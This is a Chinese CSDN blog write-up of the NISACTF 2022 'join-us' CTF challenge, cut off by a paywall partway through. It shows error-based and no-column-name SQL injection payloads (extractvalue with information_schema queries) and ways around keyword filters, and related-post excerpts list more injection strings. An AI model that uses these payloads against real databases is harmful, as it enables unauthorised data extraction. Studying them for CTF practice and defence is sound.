[NISACTF 2022]join-us - 报错注入&无列名注入

已于 2023-10-08 20:58:25 修改
阅读量559 收藏
点赞数
文章标签: 数据库 web安全 安全 ctf sql
于 2023-10-06 00:34:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/oZuoShen123/article/details/133592019
版权
本文详细介绍了在NISACTF 2022赛事中遇到的一个报错注入及无列名注入的解题过程。通过尝试不同关键字绕过WAF拦截,最终成功利用数据库中不存在的表名或函数名揭露数据库信息,以及通过报错信息获取到隐藏的flag位置。
摘要由CSDN通过智能技术生成

[NISACTF 2022]join-us

1

解题流程

点击登录,找到注入点

2
这种框,可以直接爆破关键字,看是否拦截,也可以手动尝试,发现=、union、and、or、substr、database等关键字都拦截了
1、学到了:可以用数据库中不存在的表名或者不存在的自定义函数名爆出数据库名,1'-a()#1' || (select * from aa)#
  FUNCTION sqlsql.a does not exist
2、直接甩一个报错注入上去,extractvalue(0,concat(0x7e,1,0x7e));#
  没拦截,说明可以试一下
3、1' || extractvalue(0,concat(0x7e,1,0x7e));#
  XPATH syntax error: ‘~ 1 ~’,说明报错成功了
4、1' || extractvalue(0,concat(0x7e,mid((select group_concat(table_name) from information_schema.tables where table_schema like 'sqlsql'),1,30),

了解本专栏 订阅专栏 解锁全文 超级会员免费看
Hillain
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
Sql漏洞注入报错注入
Matheus的博客
07-22 869
报错注入 在MYSQL中使用一些指定的函数来制造报错,后台没有屏蔽数据库报错信息,在语法发生错误时会输出在前端,从而从报错信息中获取设定的信息。select/insert/update/delete都可以使用报错来获取信息。 报错注入流程: 1)判断是否存在注入点。 2)构造错误的语法制造报错。 3)使用对应的报错函数来获取信息。 常用的报错函数: 基于函数报错的信息获取(select/insert/update/delete) updatexml() updatexml()函数是MYSQL对XML
Join-us
03-12
"Join-us"项目是一个专注于响应式网页设计(RWD)的订阅信息页面,旨在通过实践提升开发者在flexbox布局模块的运用能力。在这个项目中,开发者可以深入理解并掌握HTML5、CSS3以及SCSS(Sass预处理器)的相关技术,并...
[NISACTF 2022]join-us
m0_70819573的博客
03-14 260
其实一开始想到的是布尔盲注,因为输入1会返回txw4ever,输入0返回空白,但是禁用了ascii函数,禁用了updatexml函数,但是可以使用extractvalue函数。database被禁,所以可以考虑用访问一个不存在的数据库来返回数据库。接下来column被ban了,所以用无列注入join题目也有提示。进入登录界面,发现sql注入窗口,首先进行fuzz测试。最后用mid或reverse函数读取flag。爆出表Fal_flag,output。
【[NISACTF 2022]join-us
qq_40567274的博客
04-08 801
[NISACTF 2022] 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录[NISACTF 2022]前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:
MYSQL 通过Join报错注入
Ciyaso的博客
01-18 837
函数解释 约束条件 在知到表名的前提下才能操作 注入语句 and(select * from (select * from 表名 a join 表名 b using(已知的字段1,已知的字段2,……)c)) 举例 select * from (select * from users a join users b )c; select * from (select * from users a join users b using(id))c; select * from (select * f
SQL--报错注入(join列名注入)
最新发布
weixin_74020633的博客
03-29 457
报错语句中出现了''1''',其中1'是输入的,那么应该是什么闭合呢,一开始我以为是双引号闭合,然后把后面的双引号注释掉,但是报错了。fuzz测试后,过滤了一些东西(or用||代替,=用like代替,as,column),需要爆库名,用到database,但是as被过滤了,这里有又是没见过的,通过查询不存在的库名,报错回显出库名。join是把两张表的列名相加,就导致有可能会产生相同的表名,但是jion不允许合并的两个表中有相同的列名,因此通过报错得到列名。看题,典型的SQL注入
mysql注入 join_mysql报错注入
weixin_31861055的博客
01-26 252
常见报错函数1. floor()获取数据库mysql> select count(*),(concat( 0x3a,database(), 0x3a,floor(rand()*2))) name from information_schema.tables group by name;获取表名mysql> select count(*),concat(0x3a,0x3a,(select...
parent-join-client-6.2.3-API文档-中文版.zip
04-07
赠送jar包:parent-join-client-6.2.3.jar 赠送原API文档:parent-join-client-6.2.3-javadoc.jar 赠送源代码:parent-join-client-6.2.3-sources.jar 包含翻译后的API文档:parent-join-client-6.2.3-javadoc-...
join-io:快速加入文件以减少请求数
02-05
Join-io 快速加入文件以减少请求数。 安装 npm i join-io --save 这个怎么运作? join-io是可与流一起使用的中间件:打开文件并将其通过管道传递给它们一个接一个的response ,完成所有操作后,流将关闭。 join-...
Join-Us:公告和工作
06-14
优惠 目前报价: [更新] 2015 年Spring:我们计划在 2015 年Spring招收一到两名实习生。 。 实习的主题将是一个开源项目,通常是为了当地具有文化、社会或体育目的的协会的利益。 。 近期优惠: ...
Linux使用join -a1来合并两个文件
09-15
`join`命令是一个非常有用的工具,用于将两个已经按照特定字段排序的文本文件合并在一起。在这个场景中,我们特别关注`join -a1`选项,它允许我们在合并时保留第一个文件的所有行,即使在第二个文件中没有匹配项。 ...
[NISACTF 2022]下
qq_62046696的博客
07-30 2479
打开界面看见这种,格式一般都是利用管道符然后进行堆叠注入或者报错注入试一下堆叠注入试了一下被过滤掉了,那就是报错注入喽or被过滤用||代替=被过滤用like代替database里面的as被过滤,通过查询一个不存在的表,通过报错获得表名column被过滤,用无列名注入输出长度限制,mid函数,substr函数t因为as被过滤所以不能使用,database因为aa是错误的表名,sqlsql就是正确的表名,通过报错。...
sql注入--报错注入
鸣蜩十四的博客
08-05 636
利用数据库的bug进行利用,看报错信息,报错的信息会出现我们想要的信息 讲解报错注入原理非常详细的一篇博客https://blog.csdn.net/he_and/article/details/80455884 concat()这个函数用来将两个字符串连接为一个字符串 floor函数的作用是返回小于等于该值的最大整数,也可以理解为向下取整,只保留整数部分。 .rand()函数可以用来生成0或1,但是rand(0)和rand()还是有本质区别的,rand(0)相当于给rand()函数传递了一个参数,然后r
SQL报错注入的12个函数及sql注入语句
weixin_30852451的博客
07-09 1266
转来的 侵删 1、通过floor报错,注入语句如下: andselect1from(selectcount(*),concat(version(),floor(rand(0)*2))xfrominformation_schema.tablesgroupbyx)a); 2、通过ExtractValue报错,注入语句如下: andextractva...
报错注入的一些整理 By Assassin
Assassin
01-29 1246
mysql暴错注入方法整理,通过floor,UpdateXml,ExtractValue,NAME_CONST,Error based Double Query Injection等方法SQL注入1、通过floor暴错 /数据库版本/ http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((se
12种报错注入+万能语句
hanzhen668的博客
04-26 2404
1、通过floor报错,注入语句如下: and select 1 from (select count(),concat(version(),floor(rand(0)2))x from information_schema.tables group by x)a); 2、通过ExtractValue报错,注入语句如下: and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)..
NISACTF2022公开通道(复现)
as you know, nlp is fantasitc!
03-31 4776
目录middlerce(复现)join-us(复现)hardsql(复现) middlerce(复现) <?php include "check.php"; if (isset($_REQUEST['letter'])){ $txw4ever = $_REQUEST['letter']; if (preg_match('/^.*([\w]|\^|\*|\(|\~|\`|\?|\/| |\||\&|!|\<|\>|\{|\x09|\x0a|\[).*$/m',$txw
[NISACTF 2022]join-us 无列名注入 过滤database() 报错获取表名 字段名
m0_64180167的博客
10-31 176
又是sql注入来做一些吧 这里我们可以很快就获取注入点抓包开干开fuzz过滤很多东西哦 database都过滤了 那么要咋弄啊。。。
SQL进阶学习
十一.的博客
11-21 639
因为输入1会返回txw4ever,输入0返回空白,但是禁用了ascii函数,禁用了updatexml函数,但是可以使用extractvalue函数。database被禁,所以可以考虑用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Hillain

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值